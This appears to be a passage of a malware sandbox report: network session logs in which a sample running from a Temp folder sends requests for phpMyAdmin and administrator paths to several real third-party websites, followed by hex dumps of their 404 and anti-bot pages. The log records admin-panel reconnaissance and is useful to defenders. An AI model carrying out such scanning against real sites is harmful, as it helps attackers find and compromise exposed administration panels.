2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 Data Ascii: ;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:0 0 0 1px #5
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f 63 6f 6f 6b 69 65 73 5f 74 79 70 65 22 3a 22 6e 61 Data Ascii: .com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__cookies_type":"na
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 75 74 Data Ascii: re that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/phpMyAdmin/'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you will be aut
2023-12-22 20:14:55 UTC	1251	IN	Data Raw: 61 73 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 0a 09 09 09 Data Ascii: ass_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCString()]
2023-12-22 20:14:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	59652	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	178	OUT	GET /phpmyadmin HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	660	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: 0cd67af5-2a79-49ce-847c-403485db8928 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6EIt7ZeQnMtYW0kfG97wa3S8rmbVAGPFUw3FtRHBMsyQKv2PPk0JOA1ZD7k%2FblTj6ArjikENoh7pX6xCjwiqPxHKduHbq4r1yULLeCGHpt%2BADiDzcrX4oyR3GqRKwOfocAPf%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08ac0b352203-MIA
2023-12-22 20:14:55 UTC	709	IN	Data Raw: 32 61 36 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 56 65 72 73 69 6f 6e 20 3d 20 22 63 68 61 6e 67 65 2d 6d 65 72 67 65 64 2d 6d 61 73 74 65 72 2d 31 36 39 38 38 2d 31 2d 39 36 33 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 3d 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 47 72 6f 75 70 20 3d 20 22 74 68 65 6e 69 6c Data Ascii: 2a68<!doctype html><html class="no-js" lang="en"><head><script> window.AppVersion = "change-merged-master-16988-1-963"; window.AppUrl = "https:\/\/www.thenile.com.au"; window.SiteEnvironment = "production"; window.SiteGroup = "thenil
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 65 79 3a 20 22 35 65 38 36 30 66 33 35 61 37 63 38 39 34 34 32 30 33 39 37 38 64 62 37 32 63 65 36 36 39 31 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 65 72 65 6e 64 65 72 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 69 6e 67 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 6d 61 69 6e 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72 54 6f 6b 65 6e 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 41 75 74 68 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 77 69 Data Ascii: ey: "5e860f35a7c8944203978db72ce66913", prerender: { rendering: false, domain: "https:\/\/www.thenile.com.au" }, userToken: "", }; window.Auth = false; wi
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 68 6f 6f 70 73 2e 2e 2e 20 74 68 61 74 20 70 61 67 65 20 64 6f 65 73 6e e2 80 99 74 20 65 78 69 73 74 2e 20 34 30 34 20 45 72 72 6f 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 69 6d 61 67 65 73 2e 74 68 65 6e 69 6c 65 2e 69 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 Data Ascii: harset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> Whoops... that page doesnt exist. 404 Error. </title><link rel="preconnect" href="//images.thenile.io"><link rel="preconnec
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 72 65 20 61 74 20 54 68 65 4e 69 6c 65 2e 63 6f 6d 2e 61 75 20 77 69 74 68 20 46 72 65 65 20 33 30 20 44 61 79 20 52 65 74 75 72 6e 73 21 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6e 67 2d 61 70 70 3d 22 74 6e 41 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 43 6f 6d 6d 61 6e 64 42 75 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 6e 2d 68 65 61 64 65 72 20 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6d 61 6c 6c 2d 33 20 6d 65 64 69 75 6d 2d 33 20 63 6f 6c 75 6d 6e 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 2d 6d 65 Data Ascii: re at TheNile.com.au with Free 30 Day Returns!"><script src="https://js.stripe.com/v3/"></script></head><body ng-app="tnApp" ng-controller="CommandBus"><div class="row tn-header collapse"><div class="small-3 medium-3 columns"><div class="category-me
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 35 37 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 33 35 30 20 31 31 31 76 36 34 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 30 20 36 37 63 2d 37 20 39 2e 30 38 30 32 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 73 34 20 31 2e 30 30 38 39 20 37 20 31 2e 30 30 38 39 63 30 20 30 2d 35 2e 35 20 37 2e 35 36 36 38 2d 31 34 20 31 30 2e 35 39 33 35 20 30 20 30 20 38 2e 35 20 32 2e 35 32 32 33 20 31 30 2e 35 20 32 2e 30 31 37 38 20 30 20 30 2d 38 20 31 30 2e 32 36 34 2d 31 36 2e 35 20 31 33 2e 37 36 34 20 30 20 30 20 36 2e 35 20 33 2e 33 38 37 20 39 2e 35 20 Data Ascii: 57" stroke-width="10" stroke-linecap="round" stroke-linejoin="round" d="M350 111v64" /><path d="M350 67c-7 9.0802-13.5 13.1158-13.5 13.1158s4 1.0089 7 1.0089c0 0-5.5 7.5668-14 10.5935 0 0 8.5 2.5223 10.5 2.0178 0 0-8 10.264-16.5 13.764 0 0 6.5 3.387 9.5
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 3d 22 75 72 6c 28 23 61 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 37 20 37 33 63 2d 32 2e 31 36 37 20 31 2e 35 2d 31 30 2e 32 20 35 2d 31 39 20 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 32 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 31 20 38 34 2e 35 63 2d 33 20 32 2e 31 36 36 37 2d 31 36 2e 31 20 36 2e 38 2d 33 30 2e 35 20 36 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 33 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 33 20 39 36 2e 35 63 2d 32 2e 38 33 33 20 33 2d 31 35 2e 33 20 38 2e 39 2d 33 36 2e 35 20 38 2e 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 34 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 38 Data Ascii: ="url(#a)"><path d="M357 73c-2.167 1.5-10.2 5-19 5" stroke="url(#paint2_linear)" /><path d="M361 84.5c-3 2.1667-16.1 6.8-30.5 6" stroke="url(#paint3_linear)" /><path d="M363 96.5c-2.833 3-15.3 8.9-36.5 8.5" stroke="url(#paint4_linear)" /><path d="M368
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 72 63 6c 65 20 63 78 3d 22 33 31 35 22 20 63 79 3d 22 31 33 30 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 35 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 30 38 22 20 63 79 3d 22 31 35 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 36 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 39 33 22 20 63 79 3d 22 31 35 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 64 65 66 73 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 30 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 39 34 22 20 79 31 3d 22 31 32 31 22 20 78 32 3d 22 33 30 35 22 20 Data Ascii: rcle cx="315" cy="130" r="2" fill="url(#paint15_linear)" /><circle cx="308" cy="152" r="2" fill="url(#paint16_linear)" /><circle cx="393" cy="152" r="2" fill="url(#paint17_linear)" /><defs><linearGradient id="paint0_linear" x1="394" y1="121" x2="305"
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 39 2e 32 35 22 20 79 31 3d 22 31 32 31 22 20 78 32 3d 22 33 34 39 2e 32 35 22 20 79 32 3d 22 31 33 36 2e 39 31 33 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 37 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 35 Data Ascii: arGradient><linearGradient id="paint6_linear" x1="349.25" y1="121" x2="349.25" y2="136.913" gradientUnits="userSpaceOnUse"><stop stop-color="#FAB914" /><stop offset="1" stop-color="#FA6714" /></linearGradient><linearGradient id="paint7_linear" x1="35
2023-12-22 20:14:55 UTC	572	IN	Data Raw: 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 33 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 33 38 22 20 79 31 3d 22 38 31 22 20 78 32 3d 22 33 33 38 22 20 79 32 3d 22 38 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 34 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 38 37 22 20 79 31 3d 22 31 33 30 22 20 78 32 3d 22 33 38 37 22 20 79 32 3d 22 31 33 34 Data Ascii: rGradient id="paint13_linear" x1="338" y1="81" x2="338" y2="85" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint14_linear" x1="387" y1="130" x2="387" y2="134
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 33 31 63 64 0d 0a 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 30 38 22 20 79 31 3d 22 31 35 30 22 20 78 32 3d 22 33 30 38 22 20 79 32 3d 22 31 35 34 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 39 33 22 20 79 31 3d 22 31 35 30 22 20 78 Data Ascii: 31cd<linearGradient id="paint16_linear" x1="308" y1="150" x2="308" y2="154" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint17_linear" x1="393" y1="150" x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	59473	217.146.69.50	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: pistik.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	259	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:55 GMT Server: Apache / ZoneOS Connection: Upgrade, close Last-Modified: Mon, 23 Oct 2023 21:31:51 GMT ETag: "1d7b-60868f3479039" Accept-Ranges: bytes Content-Length: 7547 Content-Type: text/html
2023-12-22 20:14:55 UTC	7547	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	59680	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	278	OUT	GET /administrator/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=2fl36mfrg7n47mi7p87aekl7e6 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/administrator/
2023-12-22 20:14:55 UTC	781	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/" X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A19IbUcneaJYiNBpdycsK2QAUyFH6BqchZ4vauwPtkyQ7E1oVJF2nGz9SAsSIqB01LNag2yEMxa5ca8r%2BZN1lQ1mQvMnoBHlCI37lNxA9ZNjopsBXqJBlXBf0vcCKjAoVaum"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08ac3f6f7479-MIA
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 09 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: 2000<!DOCTYPE html><html lang="en-US" class="no-js"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 22 7d 5d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 Data Ascii: rchAction","target":{"@type":"EntryPoint","urlTemplate":"https://theproducebox.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://theproducebox.com/#organization","
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 